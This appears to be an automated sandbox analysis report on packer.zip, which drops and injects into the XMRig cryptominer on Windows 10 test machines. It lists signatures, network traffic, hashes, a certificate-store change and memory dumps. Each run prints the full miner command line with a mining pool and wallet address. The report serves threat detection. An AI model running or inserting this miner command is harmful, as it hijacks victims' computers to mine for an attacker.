Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 17:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1948 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1948 wrote to memory of 1276 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1276-16-0x00000290EC440000-0x00000290EC460000-memory.dmp
memory/1276-17-0x00000290EDD40000-0x00000290EDD60000-memory.dmp
memory/1276-18-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-21-0x00000290EDD80000-0x00000290EDDA0000-memory.dmp
memory/1276-20-0x00000290EDD60000-0x00000290EDD80000-memory.dmp
memory/1276-19-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-22-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-23-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-24-0x00000290EDD60000-0x00000290EDD80000-memory.dmp
memory/1276-25-0x00000290EDD80000-0x00000290EDDA0000-memory.dmp
memory/1276-26-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-27-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-28-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-29-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-30-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-31-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-32-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-33-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-34-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-35-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-36-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-37-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-38-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-39-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-40-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-41-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-42-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-43-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-44-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-45-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-46-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-47-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-48-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-49-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-50-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-51-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-52-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-53-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-54-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-55-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-56-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-57-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-58-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-59-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-60-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-61-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-62-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-63-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-64-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-65-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-66-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-67-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-68-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-69-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-70-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-71-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-72-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-73-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-74-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-75-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-76-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-77-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-78-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-79-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-80-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-81-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-82-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-83-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
memory/1276-84-0x00007FF6E8B90000-0x00007FF6E9693000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:09
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3952 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3952 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1560-16-0x000002B4F1E90000-0x000002B4F1EB0000-memory.dmp
memory/1560-17-0x000002B4F1ED0000-0x000002B4F1EF0000-memory.dmp
memory/1560-18-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-19-0x000002B4F1EF0000-0x000002B4F1F10000-memory.dmp
memory/1560-20-0x000002B4F1F10000-0x000002B4F1F30000-memory.dmp
memory/1560-21-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-22-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-23-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-25-0x000002B4F1F10000-0x000002B4F1F30000-memory.dmp
memory/1560-24-0x000002B4F1EF0000-0x000002B4F1F10000-memory.dmp
memory/1560-26-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-27-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-28-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-29-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-30-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-31-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-32-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-33-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-34-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-35-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-36-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-37-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-38-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-39-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-40-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-41-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-42-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-43-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-44-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-45-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-46-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-47-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-48-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-49-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-50-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-51-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-52-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-53-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-54-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-55-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-56-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-57-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-58-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-59-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-60-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-61-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-62-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-63-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-64-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-65-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-66-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-67-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-68-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-69-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-70-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-71-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-72-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-73-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-74-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-75-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-76-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-77-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-78-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-79-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-80-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-81-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-82-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-83-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
memory/1560-84-0x00007FF7A5F30000-0x00007FF7A6A33000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:09
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d